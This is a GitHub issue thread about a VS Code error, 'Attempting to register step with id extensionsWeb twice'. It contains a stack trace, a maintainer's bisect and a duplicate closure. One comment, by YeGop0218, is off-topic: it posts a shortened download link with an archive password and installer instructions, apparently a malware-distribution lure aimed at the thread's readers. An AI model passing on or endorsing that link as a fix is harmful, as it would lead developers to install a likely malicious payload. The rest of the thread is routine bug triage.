### ISSUE TITLE
Attempting to register step with id extensionsWeb twice. Second is dropped

### ISSUE THREAD

**Issue by andreamah** [microsoft/vscode#226782]
Testing #226399

1. Load the exploration build
2. Check window output channel.
3. Get an error message as follows:

```
2024-08-27 09:00:17.733 [error] Attempting to register step with id extensionsWeb twice. Second is dropped.: Error: Attempting to register step with id extensionsWeb twice. Second is dropped.
    at vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:2403:24992
    at Array.forEach (<anonymous>)
    at Aat._registerWalkthrough (vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:2403:24954)
    at vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:2403:18421
    at Array.forEach (<anonymous>)
    at Aat.S (vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:2403:18395)
    at new Aat (vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:2403:18383)
    at hmt.o (vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:1153:1589)
    at vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:1153:3309
    at Nae.d (vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:29:78918)
    at get value (vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:29:79059)
    at Object.get (vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:1153:3832)
    at new $G (vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:2715:8012)
    at hmt.o (vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:1153:1589)
    at hmt.createInstance (vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:1153:1086)
    at kq.instantiate (vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:413:68879)
    at H7e.Q (vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:504:75630)
    at H7e.P (vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:504:75412)
    at H7e.O (vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:504:75173)
    at H7e.L (vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:504:74607)
    at H7e.openEditor (vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:504:73736)
    at vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:616:23980
    at XF.Kb (vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:616:24150)
    at XF.qb (vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:616:16920)
    at new XF (vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:616:11765)
    at hmt.o (vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:1153:1589)
    at hmt.createInstance (vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:1153:1086)
    at XF.createFromSerialized (vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:616:9619)
    at o9e.bc (vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:616:51158)
    at Object.fromJSON (vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:616:57585)
    at qoi.r (vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:498:72775)
    at vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:498:72667
    at Array.map (<anonymous>)
    at qoi.r (vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:498:72648)
    at qoi.q (vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:498:72583)
    at qoi.deserialize (vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:498:72542)
    at Foe.deserialize (vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:498:80660)
    at o9e.qc (vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:616:57514)
    at o9e.pc (vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:616:57293)
    at o9e.oc (vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:616:57119)
    at o9e.Q (vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:616:55019)
    at o9e.create (vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:504:70869)
    at exs.rc (vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:2919:82847)
    at vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:2919:80101
    at hmt.invokeFunction (vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:1153:674)
    at exs.startup (vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:2919:79819)
    at tDs.open (vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/workbench/workbench.desktop.main.js:2921:100234)
    at async L (vscode-file://vscode-app/c:/Program%20Files/Microsoft%20VS%20Code%20Exploration/resources/app/out/vs/code/electron-sandbox/workbench/workbench.js:3:764)
```

Not sure if this is a bug that only lives in the exploration build, but I just thought it was strange.

**Comment by bpasero** [comment]
This reproduces in VS Code insiders for me and was introduced this month I think.

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by bpasero** [comment]
Bisect points to https://github.com/microsoft/vscode/compare/469f45091d655af743d75c7261da31678b684461...8c66a69a465e29af2e6dab9147ea051c2c2f4e41

Where I would think it is https://github.com/microsoft/vscode/commit/fdc717575e691bab8a06b782c83cc0d8ed9f34fb#diff-4f61a48ab045f3f4e34698a770888869ce3a6d6144df9bdbf812846d5ebfd0f7

**Comment by meganrogge** [comment]
/duplicate [#226841](https://github.com/microsoft/vscode/issues/226841)
